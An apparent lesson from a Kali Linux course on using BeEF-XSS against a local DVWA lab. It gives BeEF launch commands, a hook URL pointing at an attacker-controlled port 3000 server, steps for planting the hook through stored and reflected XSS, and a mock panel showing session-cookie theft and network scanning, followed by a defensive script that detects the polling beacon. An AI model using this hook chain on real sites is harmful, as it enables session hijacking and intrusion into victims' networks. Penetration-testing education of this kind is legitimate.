📰 Originally published on SecurityElites — the canonical, fully-updated version of this article.
Part of the 120-Day Kali Linux Mastery Course
Day 25 of 180 · 13.8% complete
⚠️ Authorised Lab Environments Only. BeEF-XSS sends command modules to hooked browsers. Every exercise in this lab targets your own DVWA instance or browsers you control. Never hook browsers you don’t own. Browser exploitation without authorisation is illegal everywhere.
ZAP found the XSS on Day 24. You confirmed it with alert(1). An alert box fired. Your CVSS score said Medium. Now I want to show you what that Medium actually means when you stop accepting the pop-up and start using the right tool. A pop-up is a proof of concept. BeEF turns the same XSS into a persistent command-and-control channel into the victim’s browser. Same vulnerability. Completely different impact. That’s the gap between what scanners report and what pentesters demonstrate — and it’s the gap Day 25 closes.
#### 🎯 What You’ll Master in Day 25

- Launch BeEF-XSS and understand the hooking architecture
- Deliver the BeEF hook script via an XSS injection point
- Run browser fingerprinting, network discovery, and social engineering modules
- Understand the BeEF + Metasploit browser_autopwn chain
- Write a professional escalated XSS finding for a pentest report
⏱️ 45 min read · 3 exercises · Day 25 of 120

#### ✅ Before You Start

- Day 24: OWASP ZAP — automated scanning found the XSS. Today you take that XSS finding and escalate it from an alert() pop-up to full browser control using BeEF.
- DVWA running at http://localhost/dvwa/ with security set to Low. BeEF is pre-installed in Kali — launch with beef-xss. Default credentials: beef/beef.

### 📋 Day 25 — BeEF-XSS Tutorial

1. BeEF Architecture — How the Hook Works
2. Launch BeEF and Deliver the Hook
3. Command Modules — What You Can Do to a Hooked Browser
4. Network Discovery via the Hooked Browser
5. BeEF + Metasploit — Browser Autopwn Chain
6. Reporting Escalated XSS

After Day 24’s OWASP ZAP scanning surfaced the XSS findings, Day 25 is where I show you what those findings are really worth. BeEF is the tool that connects ZAP’s XSS alert to an actual browser control channel — and it’s the reason a stored XSS in a site with 10,000 daily users is Critical, not Medium. The full methodology is in the Kali Linux Mastery Course.
## BeEF Architecture — How the Hook Works
BeEF (Browser Exploitation Framework) operates through a JavaScript hook — a single script tag that, when executed in a victim’s browser, establishes a persistent connection back to your BeEF server. The victim’s browser becomes a zombie: it polls BeEF every few seconds asking “any commands for me?” You respond through the BeEF web UI by selecting modules to execute.
BEEF ARCHITECTURE — QUICK REFERENCE

```text
# BeEF hook delivery — the XSS payload
hook.js loads in victim browser → calls home to BeEF C2 on port 3000

# Communication flow
Victim browser → GET /hook.js → BeEF server (attacker Kali)
Victim browser ← module commands ← BeEF web UI (attacker)
Victim browser → module results → BeEF server → attacker sees data

# What BeEF runs on
BeEF server: port 3000 — web UI + hook C2 on same port
Web UI:      http://127.0.0.1:3000/ui/panel (beef/beef default)
Hook URL:    http://KALI_IP:3000/hook.js
```
```text
BeEF Web UI — Hooked Browser Control Panel

HOOKED BROWSERS
  ● 192.168.56.1 (online)
    Chrome 121 · Windows 10
    Hooked: 2m 14s ago

COMMAND MODULES (selected)
  ✅ Browser > Get Cookie        → Result: PHPSESSID=abc123; security=low
  ✅ Browser > Fingerprint       → Chrome 121 / Win10 / 1920×1080
  ⏳ Network > Discovery         → Scanning 192.168.56.0/24…
  ○ Social Eng > Fake Update    → Ready
  ○ Metasploit > Browser Exp    → Ready
```
📸 BeEF web UI showing a hooked browser. The left panel lists all connected (online) browsers — each one a victim whose browser loaded the hook.js. The right panel shows command module results: Get Cookie has returned the PHPSESSID session token, browser fingerprinting is complete, network discovery is running. From this single XSS injection, I now have the session cookie that grants admin access, the full browser/OS profile for exploit targeting, and a pivot point into the victim’s internal network. This is why stored XSS on an authenticated page is Critical, not Medium.
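Seen from the defending side, the polling loop described above leaves a regular timing pattern in web proxy logs. The following is an added example, not part of the original article or of BeEF: it flags client/destination pairs contacted at short, regular intervals, and notes whether a file named hook.js was fetched from the same destination. The log format, the 192.168.56.101 address, the `/poll` path and the thresholds are assumptions made for the illustration.

```python
import re
from collections import defaultdict
from statistics import mean, pstdev

# Constructed proxy log: epoch seconds, client, method, URL. 192.168.56.101 and
# the /poll path are placeholders; the check keys on timing, not on a URL.
SAMPLE_LOG = """\
1700000000 192.168.56.1 GET http://localhost/dvwa/vulnerabilities/xss_s/
1700000001 192.168.56.1 GET http://192.168.56.101:3000/hook.js
1700000004 192.168.56.1 GET http://192.168.56.101:3000/poll?id=1
1700000009 192.168.56.1 GET http://192.168.56.101:3000/poll?id=1
1700000014 192.168.56.1 GET http://192.168.56.101:3000/poll?id=1
1700000019 192.168.56.1 GET http://192.168.56.101:3000/poll?id=1
1700000024 192.168.56.1 GET http://192.168.56.101:3000/poll?id=1
1700000030 192.168.56.1 GET http://localhost/dvwa/index.php
1700000095 192.168.56.1 GET http://localhost/dvwa/about.php
1700000100 192.168.56.1 GET http://localhost/dvwa/security.php
1700000400 192.168.56.1 GET http://localhost/dvwa/logout.php
"""

LINE = re.compile(r"^(\d+) (\S+) (\S+) https?://([^/\s]+)(/\S*)?$")

def find_beacons(log_text, min_hits=5, max_gap=30.0, max_jitter=0.25):
    """Flag (client, destination) pairs contacted at short, regular intervals."""
    hits = defaultdict(list)   # (client, dest) -> request timestamps
    hook_seen = set()          # pairs that also fetched a file named hook.js
    for raw in log_text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue           # skip malformed lines instead of failing
        ts, client, _method, dest, path = m.groups()
        hits[(client, dest)].append(int(ts))
        if (path or "").split("?")[0].endswith("/hook.js"):
            hook_seen.add((client, dest))
    findings = []
    for key, times in hits.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        # Low stdev/mean (coefficient of variation) means machine-regular polling.
        if 0 < avg <= max_gap and pstdev(gaps) / avg <= max_jitter:
            findings.append({"client": key[0], "dest": key[1],
                             "requests": len(times), "mean_gap": round(avg, 1),
                             "hook_js": key in hook_seen})
    return findings

if __name__ == "__main__":
    print(find_beacons(SAMPLE_LOG))
```

The ordinary page views to the DVWA host have the same request count as the threshold but irregular gaps, so only the port 3000 destination is reported.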
## Launch BeEF and Deliver the Hook
LAUNCHING BEEF AND DELIVERING THE HOOK

```bash
# Launch BeEF (Kali pre-installed)
sudo beef-xss
# Or: sudo /usr/share/beef-xss/beef
# Output shows: Web UI at http://127.0.0.1:3000/ui/panel
#               Hook URL: http://YOUR_KALI_IP:3000/hook.js

# Get your Kali IP (use this in the hook payload)
hostname -I | awk '{print $1}'

# Hook delivery via stored XSS in DVWA (XSS Stored module)
# Navigate to: http://localhost/dvwa/vulnerabilities/xss_s/
# Name field: anything
# Message field: your hook script
# Submit → hook loads when anyone visits the guestbook page

# Hook delivery via reflected XSS (URL parameter)
# http://localhost/dvwa/vulnerabilities/xss_r/?name=

# Verify hook in BeEF UI
# Open browser → http://127.0.0.1:3000/ui/panel → beef/beef
# Left panel: "Hooked Browsers" should show new entry within 3s
```
🧠 EXERCISE 1 — THINK LIKE A HACKER (15 MIN · NO TOOLS)
Design a BeEF Attack Chain — From XSS to Maximum Impact
⏱️ 15 minutes · No tools required